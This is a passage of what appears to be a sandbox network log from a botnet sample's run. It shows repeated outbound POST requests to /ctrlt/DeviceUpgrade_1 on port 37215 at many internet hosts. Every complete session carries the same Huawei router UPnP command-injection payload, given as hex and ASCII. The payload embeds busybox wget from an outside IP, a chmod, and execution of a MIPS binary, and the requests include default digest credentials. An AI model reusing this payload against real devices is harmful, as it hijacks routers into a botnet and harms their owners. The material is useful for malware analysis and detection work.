                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          133192.168.2.2346716197.21.86.4137215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.858381033 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          134192.168.2.2334430156.127.13.24037215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.858990908 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          135192.168.2.2358986197.120.27.10737215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.859540939 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          136192.168.2.2333986156.47.233.20037215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.860121965 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          137192.168.2.2337612197.3.73.6537215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.860671043 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          138192.168.2.2334144156.42.173.14337215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.861203909 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          139192.168.2.2346372156.225.40.13137215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.861741066 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          140192.168.2.2356056197.81.131.137215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.862255096 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          141192.168.2.2351038197.170.158.1337215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.862790108 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          142192.168.2.2341580156.196.177.23237215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.863331079 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
